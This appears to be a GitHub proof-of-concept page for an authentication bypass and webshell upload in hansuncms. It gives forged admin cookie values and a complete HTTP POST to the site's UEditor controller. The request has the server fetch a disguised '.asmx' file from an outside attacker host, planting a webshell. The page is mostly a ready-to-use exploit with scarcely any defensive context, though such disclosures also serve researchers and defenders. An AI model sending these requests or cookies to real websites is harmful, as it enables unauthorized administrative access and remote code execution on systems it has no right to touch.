Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

hansuncmswebshell

hansuncms Authentication Bypass and File Upload

hansuncms
Authentication Bypass cookies add AdminUser=AdminId=3B17A20D0B04694C&AdminUser=A5D8190690DE7EC5&AdminPwd=28AF506D68AA3AB1A8F5136675B903480F3C4A24DA67438014A80335E37AD6534880AD891A5A15A1&AdminName=A5D8190690DE7EC5&Language=30;ASP.NET_SessionId=hlz4zjbvx0dze5haljxdxuuk

poc

webshell upload more like CNVD-2017-20077

hansuncms have net 1.4.3 ueditor and Authentication Bypass

some code
code
if (context.Request.Cookies["AdminUser"] != null || context.Request.Cookies["AdminUser"]["SysUser"] != "")

cookies have AdminUser not null can use ueditor upload webshell

poc


POST /ueditor/net/controller.ashx?action=catchimage HTTP/1.1

Host: xxxxxxxxxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 59

Origin: xxxxxx

Connection: close

Referer: http://xxxxxxxx/cms/Login.aspx

Cookie:AdminUser=AdminId=1&AdminUser=1&AdminPwd=1&AdminName=1&Language=30;ASP.NET_SessionId=hlz4zjbvx0dze5haljxdxuuk

Upgrade-Insecure-Requests: 1



source%5B%5D=http%3A%2F%2Fx.x.x.x%2F1.asmx.jpg%3F.asmx

poc

poc